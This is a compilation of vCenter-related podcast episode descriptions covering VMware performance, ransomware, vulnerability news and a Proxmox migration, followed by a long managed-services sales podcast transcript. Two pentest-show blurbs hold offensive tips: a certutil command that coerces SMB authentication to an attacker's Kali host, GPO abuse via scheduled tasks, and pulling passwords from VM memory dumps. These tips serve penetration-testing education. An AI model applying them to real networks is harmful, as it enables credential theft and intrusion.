Centralized management utility for VMware
POPULARITY
You've found The Backup Wrap-up, your go-to podcast for all things backup, recovery, and cyber-recovery. In this episode, we tackle one of the scariest threats out there - ransomware targeting VMware ESXi environments. I'm joined by Prasanna Malaiyandi and our special guest Melissa Palmer, also known as @vmiss, who's an independent technology analyst and ransomware resiliency architect. We get into why virtualization environments are such juicy targets for attackers, how they're specifically going after vCenter and ESXi hosts, and why your backup strategy is probably missing some critical components. If you've got a virtualized environment, you need to listen to this. Melissa brings her unique perspective from both the virtualization and security worlds to help you protect your most critical infrastructure. So buckle up - this is an episode you can't afford to miss if you want to keep your VMware environment safe from ransomware attacks.
In episode 091 of the Unexplored Territory Podcast we have Ravi Soundararajan as a guest to discuss all things performance. There's a reason Ravi's name on X is "vCenterPerfGuy". Ravi has been involved in performance troubleshooting and engineering for the longest time, and shares his insights in some of the most recent findings with regards to vSphere Tagging and the API performance. Ravi also discusses vCenter bandwidth requirements and some of the vCenter task limits there are in place. Make sure to listen to this episode from start to finish!Some papers discussed:https://www.vmware.com/docs/vcenter80u3-tagging-perfhttps://www.vmware.com/docs/robo-vcenter67-perfhttps://www.vmware.com/docs/vc6-perf-bpDisclaimer: The thoughts and opinions shared in this podcast are our own/guest(s), and not necessarily those of Broadcom or VMware by Broadcom.
Take a Network Break! We start with a brief follow-up on our CVE coverage, and then dive into a serious one-two set of vulnerabilities being exploited in Palo Alto Networks software, VMware taking a second crack at patching a vCenter vulnerability, and notable CVEs in D-Link and HPC gear. An AI company loses a quarter... Read more »
Take a Network Break! We start with a brief follow-up on our CVE coverage, and then dive into a serious one-two set of vulnerabilities being exploited in Palo Alto Networks software, VMware taking a second crack at patching a vCenter vulnerability, and notable CVEs in D-Link and HPC gear. An AI company loses a quarter... Read more »
Take a Network Break! We start with a brief follow-up on our CVE coverage, and then dive into a serious one-two set of vulnerabilities being exploited in Palo Alto Networks software, VMware taking a second crack at patching a vCenter vulnerability, and notable CVEs in D-Link and HPC gear. An AI company loses a quarter... Read more »
On this episode of the Virtually Speaking Podcast, we're joined by Dilpreet Bindra, Senior Director of Engineering at Broadcom. As a leader of the VCF Workload Organization, Dilpreet drives the delivery of runtime platforms and automation essential for workloads and clouds. In this episode, Dilpreet discusses his extensive experience with key VMware technologies like ESXi, the kernel, vMotion, Storage vMotion, vCenter, and more. He also explains how VMware by Broadcom enhances the cloud-like experience, enabling customers to deliver greater value for their businesses. Additionally, Dilpreet shares insights into how Private AI empowers VMware by Broadcom to offer a new class of workloads, maintaining the simplicity and resource management principles that VMware was built upon. Links Mentioned Private AI and Advanced Services on VCF: What's Next? Playlist: VMware Explore Las Vegas 2024 The Virtually Speaking Podcast The Virtually Speaking Podcast is a technical podcast dedicated to discussing VMware topics related to private and hybrid cloud. Each week Pete Flecha and John Nicholson bring in various subject matter experts from within the industry to discuss their respective areas of expertise. If you're new to the Virtually Speaking Podcast check out all episodes on vspeakingpodcast.com and follow on TwitterX @VirtSpeaking
In this conversation, Katarina Brookfield discusses her career trajectory and her current role at Broadcom. She shares defining moments in her career, including her experience working on the Black Sea Maritime Archaeology project. The conversation then shifts to the newly announced vSphere IaaS control plane and its benefits. Katarina explains that the control plane provides a comprehensive solution for deploying workloads, including additional services like storage provisioning and load balancing. The conversation also covers the self-service nature of the control plane, the different interfaces for consumers and admins, and the integration of HashiCorp Packer for building and customizing VM images. The TKG service, which allows for the deployment of managed Kubernetes clusters, is also discussed, highlighting its ease of use and integration with vSphere. The conversation concludes with a discussion of the new features in the latest version of the TKG service, including cluster auto-scaling and the decoupling of TKG from vCenter.TakeawaysThe vSphere IaaS control plane provides a comprehensive solution for deploying workloads, including additional services like storage provisioning and load balancing.The control plane offers a self-service experience for consumers, allowing them to easily deploy the services they need.Different interfaces, including APIs, CLI, and UI, cater to the preferences of different users, making it accessible to both admins and consumers.The integration of HashiCorp Packer allows for the building and customization of VM images, providing flexibility and automation.The TKG service simplifies the deployment of managed Kubernetes clusters, making it accessible to users with little Kubernetes experience.The latest version of the TKG service decouples it from vCenter, allowing for faster delivery of new Kubernetes versions.New features in the TKG service include cluster auto-scaling and the integration of HashiCorp Packer for building and customizing VM images.Chapters00:00 - Kat's Career Trajectory and the Role of Defining Moments09:20 - The Comprehensive Solution of the vSphere IaaS Control Plane11:02 - Enabling Self-Service and Catering to Different User Preferences18:14 - Flexibility and Automation with HashiCorp Packer Integration22:47 - Simplifying Kubernetes Deployment with the TKG Service29:14 - Decoupling TKG from vCenter for Faster Delivery of Kubernetes Versions38:36 - New Features in the Latest Version of the TKG ServiceDisclaimer: The thoughts and opinions shared in this podcast are our own/guest(s), and not necessarily those of Broadcom or VMware by Broadcom.
Hi, today's tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer “crops” to a domain admin's desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:UsersDomain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login
Continuing our special 10-part series "Exploring VMware Cloud Foundation." Virtually Speaking hosts Pete Flecha and John Nicholson interview various subject matter experts to break down the components that make up VMware Cloud Foundation (VCF) and provide insights into its powerful capabilities for private cloud environments. In Episode 6, 'VCF Networking' we delve into the intricate world of networking within VMware Cloud Foundation, with a focus on the powerful capabilities of NSX. Joining us are Heath Johnson and Kyle Gleed from VCF Technical Marketing, who guide us through the integration of NSX within VCF and its transformative impact on networking architecture. Our discussion encompasses various facets of networking within VCF, all revolving around the versatile functionalities of NSX. From discussing the essential role of software-defined networking (SDN) for private cloud environments to exploring real-world use cases such as mobility, disaster recovery, and automated networking for Infrastructure-as-a-Service (IaaS) deployments, Heath and Kyle provide valuable insights into NSX's applicability in diverse scenarios. A highlight of the conversation is the introduction of the VPC Simplified UI, seamlessly integrated within vCenter to streamline networking operations within VCF. Heath and Kyle walk us through the simplicity of deployment, catering to both greenfield and brownfield environments, while also offering strategic guidance on migration strategies to maximize efficiency. Furthermore, the discussion delves into the revolutionary concept of Data Processing Units (DPUs) and their integration with NSX within VCF. By harnessing DPUs, VCF unlocks unprecedented network offloading capabilities, optimizing performance and scalability for modern cloud infrastructures. Join us in Episode 6 as we unravel the complexities of VCF Networking with NSX, exploring how VMware Cloud Foundation redefines networking paradigms through seamless integration and cutting-edge technologies.
Today's tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU your.kali.ip.addressarbitrary-folder. I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you're on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on evasion! When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you've got the vmss2core utility, which I couldn't find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps. Can't RDP into a victim system that you're PSRemote'd into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp | select-object portnumber` And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!
Join Eric and Corey where they discuss how to enable Okta for vCenter with Arkadisuz Krowczynski. His blog on the topic can be found at https://iamse.blog/2023/04/25/enable-okta-for-vmware-vcenter-server/
In this episode I cover details on some of the first Co-Pilot+ PCs that shipped this week, I get into 3 vulnerabilities in vCenter that were disclosed this week, a new AVD feature and much more! Reference Links: https://www.rorymon.com/blog/3-major-vcenter-vulnerabilities-worrying-sql-security-news-co-pilot-pcs-shipping-now/
Europol and partners shut down 13 terrorist websites. A data breach at the LA County Department of Public Health affects over two hundred thousand. The Take It Down act targets deepfake porn. The Five Eyes alliance update their strategies to protect critical infrastructure. VMware has disclosed two critical-rated vulnerabilities in vCenter Server. The alleged heads of the "Empire Market" dark web marketplace are charged in Chicago federal court. A new malware campaign tricks users into running malicious PowerShell “fixes.”Researchers thwart Memory Tagging Extensions in Arm chips. A major e-learning platform discloses a breach. On our Industry Voices segment, we are joined by Guy Guzner, CEO and Co-Founder of Savvy to discuss "Reimagining app and identity security for SaaS." Clearview AI offers plaintiffs a piece of the pie. Our 2024 N2K CyberWire Audience Survey is underway, make your voice heard and get in the running for a $100 Amazon gift card. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest On our Industry Voices segment, we are joined by Guy Guzner, CEO and Co-Founder of Savvy to discuss "Reimagining app and identity security for SaaS." Selected Reading Europol Taken Down 13 Websites Linked to Terrorist Operations (GB Hackers) Los Angeles Public Health Department Discloses Large Data Breach (Infosecurity Magazine) New AI deepfake porn bill would require big tech to police and remove images (CNBC) Five Eyes' Critical 5 nations focus on adapting to evolving cyber threats to boost critical infrastructure security, resilience (Industrial Cyber) VMware by Broadcom warns of critical vCenter flaws (The Register) Empire Market owners charged for enabling $430M in dark web transactions (Bleeping Computer) From Clipboard to Compromise: A PowerShell Self-Pwn (Proofpoint US) Arm Memory Tag Extensions broken by speculative execution (The Register) Star ed-tech company discloses data breach (Cybernews) Clearview AI Is So Broke It's Now Offering Lawsuits Plaintiffs A Cut Of Its Extremely Dubious Future Fortunes (Techdirt) Share your feedback. We want to ensure that you are getting the most out of the podcast. Please take a few minutes to share your thoughts with us by completing our brief listener survey as we continually work to improve the show. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
Mit etwas Verzug melden wir uns mit prall gefüllten Sendungsnotizen zurück. Heute gehen wir durch ein richtig tiefes Tal der Tränen: Sicherheitslücken im vCenter, Bugs in WatchGuard Application Control, Sicherheitslücken in CheckPoint Security Gateways, Sicherheitslücken in Microsoft Recall, Sicherheitslücken in Azure SQL Managed Instances und... Drucker. Wir hatten trotzdem Spaß - ihr hoffentlich auch. ;)
Hey friends, today we continue our series all about migrating from VMWare to the world Proxmox! Specifically: Getting my first Proxmox-based NUCs out in the field for live engagements! Pulling the trigger on two bare-metal Proxmox servers to eventually replace my vCenter environment. OVHCloud made it super easy to to add Proxmox to those bare-metals with a simple wizard. I couldn't figure out how to get a Proxmox VM as the main firewall for the whole Proxmox node, but it turns out it helps to RTFM. When getting a bare-metal OS/hypervisor installed, be careful in that the provider may leave the management ports of that host open to the whole world. In OVH's case, they have a software firewall that can be tuned so that, for example, only you can hit the management ports for the box. Getting VLANs setup is a snap once the virtual hardware stuff is in place.
Sadly, the Broadcom acquisition of VMWare has hit 7MinSec hard – we love running ESXi on our NUCs, but ESXi free is no longer available. To add insult to injury, our vCenter lab at OVHcloud HQ got a huge price gouge (due to license cost increase; not OVH's fault). Now we're exploring Proxmox as an alternative hypervisor, so we're using today's episode to kick off a series about the joys and pains of this migration process.
In the latest episode of GreyNoise Labs Storm⚡️Watch, we delve into a variety of cybersecurity topics that are crucial for professionals to stay abreast of. We kick off with a discussion on the World Economic Forum's Cybersecurity Outlook for 2024, providing insights into the anticipated challenges and strategies for the coming year. This is followed by an analysis of the Allianz Global Risk Barometer Redux 2024, which highlights the evolving landscape of cyber threats and their implications for global risk management. The episode also introduces LogBoost, a tool designed to enhance log analysis, which is essential for identifying and mitigating security incidents. We then shift our focus to a recent vulnerability in VMware's VCenter, as reported by Censys, and discuss its potential impact on virtual infrastructure security. GreyNoise's own research is featured prominently, with a deep dive into the F5 Big IP Remote Code Execution (RCE) vulnerabilities. We also revisit the last GreyNoise Tag Webinar, which offers a comprehensive understanding of GreyNoise tags and their application in cybersecurity. Additionally, we review the 2023 GreyNoise Retrospective Internet Exploitation Report, which provides a retrospective look at the past year's internet exploitation trends. To keep our listeners informed on the latest cyber threats, we cover the most recent tags and active campaigns as observed by GreyNoise, offering a real-time perspective on the threat landscape. Lastly, we round up the episode with a discussion on the Known Exploited Vulnerabilities (KEV) catalog from CISA, which is an essential resource for cybersecurity professionals to prioritize their defensive efforts. Episode Slides >> Join our Community Slack >> Learn more about GreyNoise >>
Listen to the powerhouse team of Brandon Ivey and Christoph Uhlig from Evok Technologies. They live and breathe cloud & security sales. Being uniquely positioned to understand what a customer is going through, they talk modernization, augmenting teams, and the struggles they help customers overcome. Can you believe that we're already at 100 episodes? While we go and ramp up and get ready for season three, we're gonna take you back, listen to some of the great moments in these past episodes. So stay tuned as we take you back to season one and two. – Hey everybody, welcome back. I'm your host, Josh Lupresto and this is the Next Level BizTech Podcast. So today we are actually wrapping up the first series in season two, and we're talking about managed services and how we're solving this tech talent issue that we've got going on with security and the broader technology landscape. So if you tuned in on the first episode, you heard Jason Stein, and he talked about what Telarus is doing overall from the practice and how we go to market and what we're seeing and the trends and things like that. And then we had one of our great suppliers on where Thrive came on and talked about all the things from a technical perspective, their products, where they're fitting, how they go to market with those, differentiators, all that good stuff. But today we get to hear from what I think is really critical. We get to hear from the partner's perspective. So we got some good friends of mine. We've been spending a lot of time together lately. We got Brandon Ivey and Christoph Uhlig from EVOK Technologies. Gents, Brandon, welcome. – Thanks for having us, Josh. It's really great to be here. – All right, so let's kick this off. Brandon, I'm gonna come to you first here. Part of my favorite story is how do you get started? Everybody has a different path. Some people super linear, some people do crazy windy stuff and end up in this world. I'm curious to hear how you guys get started in this. – Absolutely, so it's kind of interesting. I think Christoph and I both have similar backgrounds and kind of went through similar trials and tribulations, if you will, through our career path. We both started out in entry-level sales jobs coming out of college, worked up the corporate ladder, led sales teams, became directors or VPs and led overall go-to-market strategies and new logo acquisition sales. And interesting enough, neither one of us really wanted to be in management roles any longer. And we found ourselves starting at a cloud company on the same day in the same role. And what was interesting enough, at least from my perspective, is that we kind of hit it off from the get-go. I think Christoph may have had a difference of opinion, but he was like, “Hey, I want to be in line with that guy, he seems competitive.” And we fed off of that. And so what we did to begin with was we started interviewing all of the top reps at the organization, trying to figure out what was the secret sauce to be successful, right? In long story short, most of them didn't have a lot of positive feedback. It was, if you got lucky enough to be tagged to that right account that was growing, et cetera, et cetera, then you had some success. So we kind of stumbled and went through some different challenges the first few months at that cloud company. And then we realized we needed a force multiplier. And I had some little exposure to what the channel ecosystem was, more from a competitive standpoint, based on where I was when I was leading a sales team, there was a channel. And so we introduced that, we started working with some regional players, and we started integrating that into our go-to-market strategy. And effectively after six months at the cloud company, we took it to the executive team and the board and said, “Hey, I think this is what we need to do.” We partnered, Kristoff and I effectively partnered. We created our own business model within a business, if you will. And I think that's what's kind of allowed us to have the success that we're having coming up or at least kicking off this new venture two and a half years ago. – Love it. Kristoff, any interesting door-to-door experience? I mean, I'm a vacuum guy. I don't know if you guys have, you know, I always… – I think you know me too. I think we talked earlier and you teed that one right up. But no, like, just like Brandon, I think, you know, we were willing to do what we needed to, to learn the art of hard work and creativity. Yeah, we've both had plenty of door-to-door opportunities. To really grind, we've had some really unique creative opportunities in our career that took some critical thinking. But, you know, all of that led up to the fact that I think sales and just working with people was like really important to us. We wanted to help people solve problems. And, you know, I know we're gonna talk a little bit about our business in a bit, but I think being so integrated into sales gave us a unique perspective to help us be more effective for our customers today from a procurement and buying standpoint. I often say, I think the best defense lawyers once were prosecutors and vice versa, understanding, you know, the intricacies of the other side, you know, really, really well, allows us to, I think, serve our customers a lot more effectively. But yeah, I mean, to Brandon's point, when we got to this cloud provider, us realizing the power of the channel, and really what that force multiplier could do was, you know, a game changer. It was like an aha moment for me, for sure, because I had had zero exposure to the channel. And when we looked and we interviewed these, you know, previous sales reps for best practices and what's replicable and what can we do to be successful here, the reality was they weren't closing new logos. They weren't getting in front of new companies. And, you know, the channel gave Brandon and I that opportunity. – That company is a channel first company now, by the way. So clearly this strategy works. – I may be biased, but I think this is where the industry is going. It is funny though. I mean, it is funny as long as we've been doing this and as long as Telerus has been in existence, it's still fascinating to me how many people are just not familiar with the channel yet. And obviously we're all seeing the convergence of doing away with some of the direct sales and moving more headcount over to channel and supporting channel. But, you know, just when we think it's been in existence for a while, it's still, if you zoom out, it's still so early in some instances. – I think a lot of that's too with the, there's been a lot of focus on specific technologies over time. So just the simple fact that we're discussing, you know, MSP or MSSPs today, you know, that's kind of broadening out that scope, right? So, you know, I think it's only gonna get bigger and bigger like you mentioned. – All right, so we were talking about your business now. Tell everybody, fill us in, you guys have a cool go-to-market model and I love some of the focuses that you have on the technology side, but let everybody know what is Evoke? – Sure, well, first of all, Evoke stands for Enable, Validate, Optimize, Knowledge Transfer. And just like Chris just mentioned, essentially we wanted to take what we thought were how would a customer want to procure things? How would they want to run a process? How would they want to evaluate the market? How would they essentially want to ensure that they have a consistent buying experience that's productive and mitigates bad customer experiences coming out the backend? So we took those kind of four terms, if you will, layered that into what we thought would be the right customer engagement. We kind of trialed that, if you will, with a few anchor tenants, found out it was productive. And then we've replicated that now over the past three years. But, you know, who we are essentially, like Kristoff mentioned, we did a lot of time in sales. And the last thing we want to do is be a sales rep to our individual clients. We have really formed relationships with them now to be an extension of the team, to provide all that intellectual property to them that allows them to realize, oh, hey, there is a better way of doing this. Or potentially they're just getting exposure to a provider that they would have never even looked at because it's not in Gartner, or that doesn't come up on an SEO search, or whatever it might be. And I think that started to change that dynamic of like, oh, this is interesting, or this is advantage, or potentially this is just providing more value than what we were doing or how we were doing it in the past. So yeah, but we founded it three years ago. It's been going strong with groups like Telerus supporting us and enabling us. We've seen a lot of success and our clients have, you know, they're like, when can we be a reference? How can we help scale your business? What does this look like? And that's very rewarding. And it's something that, you know, most salespeople probably don't get to experience in that similar role, right? So yeah, it's been great. – Good point. So let's switch gears here. I wanna talk about, you know, firstChristoph how you learned about this technology, and then really maybe just let's weave that into the first deal. We're gonna get to a more recent deal as we move this on and kind of into the weeds and the intricacies of it. But talk to me about, you know, was it when you're at that cloud company, was it before that? I mean, what's your first exposure to this whole managed services landscape and talking about just that first deal? What was that like? – So I would say, you know, our experience working at hosting gave us immense insight into managed services in general and just understanding the criticality of what that offering ultimately does. You know, both from a provider perspective, but also more importantly from a customer's perspective. But, you know, back in, I don't know, call it 2012, 2011, 2012, you started seeing a massive shift from on-prem to the cloud, right? Like people realizing, hey, AWS is something. Azure is something. Private cloud and getting this out of our facility and into a data center that's redundant and supported. I mean, it's something we need to move towards, but not a lot of people knew how to do it. And, you know, we started meeting with just tons of customers that wanted help with that journey. They wanted ideas, they wanted a roadmap. They wanted to figure out how do we take this on-prem, you know, and move this into the cloud? And how can we, you know, get some of these mundane tasks of call it monitoring and patch management and antivirus and performing backups and the day-to-day care and feeding of the environment? How do we get this off our plate and free us up to focus on the core competencies of our business and, you know, what's really driving our company forward? And then secondly, how do we solve things like database management and database architecture and security services and some of the stuff that, frankly, they couldn't even find people, you know, to fill those roles. And so you have a system administrator that's potentially getting paid 100K a year, patching servers, you know, 75% of his time. And then the other 25% of his time moonlighting as like a security analyst or, you know, a database administrator, it just wasn't scalable. So I think when companies started realizing, hey, we need to get this stuff off-prem and we need to more importantly find a partner to co-manage this so we can create a RACI matrix that's clearly defined, hey, we want to continue to do these things at the application layer, but from the OS down, let's pass this off to a partner that we can depend on that can build a highly redundant, highly manageable, scalable infrastructure. And I think that's really when, you know, we first got exposure and it was just coming by the waves and it hasn't stopped today. By the way, companies are still, you know, we'll get into it, I'm sure a little bit later, but they're still looking for this more than ever. And then when I shift into kind of thinking about, you know, call it first deal, I won't probably get into the first deal, but I'll tell you about a deal that I think is super applicable to this conversation. So we're working, and this is, you know, as Evoke, this was post our days at hosting and we're working with a large university here in Colorado that, you know, unfortunately they were ransomware about four years ago. They ended up paying the ransom, you know, it was a really tough situation for them. And, you know, they looked at the problem and said, gosh, you know, we need to figure out a solution to help us, help make us more secure. And what they did, you know, for better or for worse, they started throwing technology at the problem. You know, they started looking at EDR solutions and ultimately they selected Carbon Black. They looked at, you know, different high profile security partners like Palo Alto, and they put, you know, architected their entire environment for Palo Alto. They incorporated, you know, email filtering. What they didn't really count on was the noise that all of those tools are gonna create. And those tools are great, they're great tools, but you can't solve issues necessarily just with tools. What you need is services, right? They had 2,500 endpoints. They had over 600 lab workstations across the university. They had over 200 VMs within their environment. And like I said, they were just getting noise, but really I think what they figured out after just, you know, years of trying to solve this with, you know, patching tools and technology into the problem, they realized we need a SIM, we need a security operations center that's staffed 24 seven that has multiple shifts. It's constantly looking at our logs, constantly looking at our alerts. And we need, you know, a true MDR solution. We need, and the R of that, you know, managed detection and response being the most critical aspect. We need a partner that can actually react on our behalf, can quarantine the environment, can be an extension of our team. By the way, I didn't mention it, but this university had one security officer. That's it. Yeah, nobody. So he's getting alert overload, alert fatigue. He hadn't looked at the alerts in, you know, over a year, just because it was just piling into his email. So for us to go out and really, you know, find a partner, help run a competitive process that, you know, not only did he get insight into what's available in the market, but, you know, by our process, I think he was able to make the right decision for his organization to really bring in a group that could act as an extension of his team and help deliver, you know, on his behalf. And I'll tell you, the other thing that I want to comment on is, you know, there's providers that exist out in the market today that have great technology. And they may struggle on services. They may be having service-related issues. And that technology is only as good as the services behind it. It doesn't matter if it's the best in the world, upper right corner of magic from a technology standpoint, unless the service and methodology and approach is sound, it really means nothing. – Yeah, you brought up a couple of good points in there. I want to go back to, I'm curious, you know, we always talk about, and I try to determine, are we in the middle of paradigm shifts? Did the paradigm shift already happen, right? In hindsight, we all, you know, we can see a little clearer when some of these things happen, you know, when the bull market started, when the bear market started, all of that. But if you think back to the hosting days and kind of that, let's call it a way, nine, 10, 11 timeframe. So you've got this, you know, AWS launching major product, right? Oh, six, oh, seven, kind of in that era, you've got the economic collapse of when people went, wait a minute, I used to buy all this stuff. I used to CapEx outlay it. Now I'm a little leery on that, you know, and, you know, there's the whole, when AWS comes out, now this is just for dev. It's never going to make it to prod. I mean, this is not the same uptime I can get in a data center. And don't get me wrong, there's places for gear in data center, I'm not disputing that. But I'm just kind of curious, is that, is that about that time where you really felt that wave of when things shifted and people started really taking this seriously and said, yeah, we got to look at this, we got to look at it. And it's just that inevitable wave that hasn't stopped. Did it start around that time as well for you? – I would say so, to a large extent, you know, back in those days, it's kind of like what security is today. People use these blanket terms security. And it's like, well, what does that actually mean? Like, let's unpack that. That's what, there's a ton of ways you can go about, you know, talking around security. And the same thing held true for cloud. I think back then they broadly said cloud. Of course, there's the concept of private cloud. There's on-prem, there's public cloud, meaning multi-tenant within a provider. And then there's true public cloud with the likes of Azure, AWS and Google. But I think a lot of people back then felt this unbelievable pressure to go to the hyperscalers, right? To go look at AWS, to go into Azure, because that was the flashy lights. Those were the things that were in the news. That was what the trades were saying that the next big wave is. And it's not wrong for certain applications. If you're, that's why startups are, were perfect for AWS and Azure and that, because they actually architected their applications in the hyperscaler cloud. And largely to a certain extent for the scalability of those. But, you know, what we saw was a mad rush to AWS and Azure and then a pullback, you know, back into, you know, private cloud and realizing like, look DevOps may not be for everybody. It may, you know, there's applications that are fairly predictable and have static workloads that still need, you know, a certain amount of, you know, managed services and support. But, you know, not everything needs, you know, there's not one size fits all for all of those environments. But I would say, you know, it was about that time, to your point that, you know, we really started having those conversations and seeing that shift. – Yeah. Good point. – I was going to say, yeah. I mean, I think economic pressure always plays a role in a lot of technology transformations across enterprises. I mean, even now we see large enterprises looking to go to more back to the old school approach of bare metal services, right? Like there's a lot of different use cases for that. I mean, I don't know if that'll be widely adopted, but there's supply chain issues and economic pressures. So, you know, those two things are driving a behavior, just like in cybersecurity, we have insurance policies and rates going up. It's driving a behavior. It's having specific impact. Back then it was co-location, half X expenses, transitioning to an OpEx, focusing on EBITDA, you know, all of those different things play into what enterprises make as decisions, right? And so I think as long as we're staying on top of those market trends and understanding what's taking place, not only in the technology spectrum, but holistically, you know, that helps ensure that customers make better decisions. – Yeah. Good point. So I want to talk about relationships. You know, as you look at this, right? All of our partners have started out in different places, in different skill sets, in different technologies. Some started in cloud and then went to network. Some started in network and then went into, you know, all the other things. So I'm always kind of curious. I mean, you guys kind of brought it up a little bit earlier, but maybe,Christoph I'm kind of curious about, you know, when you start having these strategic conversations, when the wall is down, right? When the customer really feels like you're an extension of their team, what does that do for the relationship with the customer when you're covering all these things? – So I think it's critical. And, you know, Brandon and I have been very passionate about this topic for a long time. You know, we truly believe that if you go solve the mission critical objectives for an organization, or you help solve, you know, a bridge towards securing applications, keeping applications available, helping with, you know, the great resignation is a real thing. People are leaving companies. People are having a hard time finding people. People are having a hard time keeping people. You go solve mission critical objectives for organizations, you get everything, right? Like the floodgates open, you gain their trust, you gain almost everything that you could possibly want out of that relationship. So, you know, we typically are passionate about wanting to focus on the cloud and security piece of the business as a primary objective. It's always something that, you know, we get into with customers is tell me about your team, tell me about your skillsets, tell me about, you know, what you guys are trying to accomplish, tell me about the gaps that you may have across your organization. And as we start to understand like, where is there pain coming from? Where are they looking to improve organizationally? And we can start helping to identify areas and unbelievable providers that can come in as an extension. It truly does help secure and build that relationship, but it's not a one deal close type of situation. But the reality for a lot of these companies is, you know, the days of going to like an IBM and expecting to get everything under one roof is dead. Like instead, you know, there's laser focused, really good providers that exist out in the market today that are really good at one or two things. And it's important for Brandon and I to know who those guys are. And being able to partner with a company like Telerus and you know, your great engineering team, it's just been hugely advantageous to us because we can get insight into, okay, what are these other hundred customers across the US experiencing from these providers? Have they been happy ending? Have they been happy stories? Have they been, you know, hey, they said all the right things at the beginning throughout the sales process, but then, you know, it was a disaster. You know, once we got into the door, that's hugely important for Brandon and I to know what we're getting our customers into. It's just like when I go, it's not a perfect analogy, but when I go car shopping, you know, every three, four years, it's unbelievable the technology that has changed, you know, and is available. I don't know. So I have to really just rely on the sales guy who's telling me that, and that's not necessarily fair. So to have a guy that's all they're doing is analyzing the industry and the market and ranking and scoring providers, it's super important for us to give that same insight to a CIO who also doesn't have the time over more than three or four or five years of analyzing. What's new? What's different? What should I be aware of? So yeah, relationships are huge, but most importantly, it's, you know, solving those mission critical issues, I think gains that trust immensely. – Good point. Brandon, I want to come back to you. I want to talk about challenges. You know, I think we're painting a really good picture here of there's a lot of value that we add, right? When we come in, when you guys come in, and you know, you're helping the CIO build something, build something, build something, and then this CIO might bounce and the company loses him, you know, you got great value in that from, you've helped him, you've helped establish yourself at the last company. Now he's leaning on you going, what's the new latest? What's the greatest tech that I should know? So certainly like these things take time to grow and to grow some of these relationships. I'm curious with what you've been through from a challenges perspective, what are the difficult parts of these conversations? – So we've gone through that. I'm sure, you know, most people have where the CIO or the executive IT person leaves, or you just end up having to get, go work with another individual. So potentially put in all that effort. You know, one thing that we've realized is you learn the most about an organization by running a process. And so that's probably the most challenging thing, especially if someone new steps in. So I'll take that as a secondary part of kind of like, what are the challenges that we see, right? So I think the biggest challenge, especially if you're focusing on mission critical workloads or whatever is probably the most pertinent or complex to the business, is actually establishing what do they have in place today? Usually it's a barrage of things over the last decade that maybe somebody's still just paying a bill, et cetera. So you have to establish that baseline, understand the expectations and needs of what's going forward and then being able to provide some thought leadership around all of that. You know, that's a very challenging process, right? And especially depending on if you have a non-technical executive, that can make it more challenging. If you have somebody who inherited just a number of different things, now you're picking through, you know, it's like, you know, you're just having to dive so deep into something that potentially they don't have access to, they don't have information from, and then it leans into the providers, right? So now where we have to take it a step farther and a lot of times those groups don't have, you know, run books set up, they don't have any kind of scripts put into place, they don't have any kind of, you know, diagrams or Visios or architecture references or security references, anything, right? It's just, essentially they were sold a product at some point, it's been potentially implemented, they're paying a bill and now it's, you know, it can be our job to figure out, well, we need to make sure that we check that box because you're either using it, not using it, or how is it applicable to the business, right? And that's where when you start trying to wrap that back into thought leadership and providing, okay, well, we need to go down that path of leaning on the different engineers across Telarus or the providers or whatever it may look like to come up with a holistic solution that actually solves everything that they have if they need it, in addition to what's needed or expected, and then providing like, well, maybe we can consolidate or rebind or evolve all of those things into the next level of, you know, where market trends are going or what's taking place in an overall environment. And that's by far the biggest challenge. And I mean, you know, I think everybody probably experiences that and, you know, that kind of leans back into the relationship piece that we just discussed where if you run that process with someone and you come out the backend where they're like, thank you, then you know you did your job, right? And you're probably gonna get another opportunity. And that's our whole objective is we wanna do our very best because then they're gonna give us that next opportunity. If we do that, we get the next project. We get the next opportunity. If they move to another business, we get a follow them there. And so that's been very rewarding from that perspective. – You know, it's funny. We talked in the beginning about this whole channel thing where we feel like we've been doing it a while, but you know, you bring up a good point that reminds me that I think the last people to really hear about and understand this channel are the customers. Well, they don't care, right? Why would they? But once they understand it, it's, wow, I didn't know this existed and this is amazing. Please help me. So it's been really cool to your point to see a lot of these go from, hey, I don't know who you are. I think I'm pretty cool working some of these, you know, these technologies myself. I don't really understand quite where you can help me. You know, are you a middleman? And when they take that to, you know, to your point, let us run a process. Let us help you with some of these mission critical workloads and applications, thinking through things that they hadn't thought through. There are sometimes those aha moments of you take it from, I didn't need you to, I can't live without you. Please look at this next project that we have coming in six months, 12 months. But, you know, I've seen three, four years out, some of these crazy things and that, that to your point, that's the aha moment. I think when you know that you're looped into that process, that's the click factor, but sometimes it takes time. And, you know, in these enterprise deals too, I think we talked about getting flat footed when some of these CIOs or whatever leave, it just underscores, geez, now I got to know procurement. Now I got to know tech. Now I got to know business leader. You just constantly trying to make sure that you know, all the right people in the account. And out of your point, it just takes time. – You summed up exactly what we just discussed, right? I mean, I think we have a very large client here in Denver. So I think eight or 9,000 employees and it was that exact same process, right? It was, you know, I don't really understand it or what it, you know, what value is this really going to bring in? Essentially, we just let us run our process. And if you see value at the end of it, fantastic. And if you don't, you know, we'll part ways. And- – I love the takeaway approach. That's like, it's one of my favorites. Cause it's just here, here it is. Look, we're so confident that this is going to work. It doesn't all go- – We've had other organizations, they realize how much time, effort, data, things that we bring to the table that they paid us for these engagements, right? So there is real value. There is, you know, a real model here. And I do think that the more that you run strategic processes and not just a, 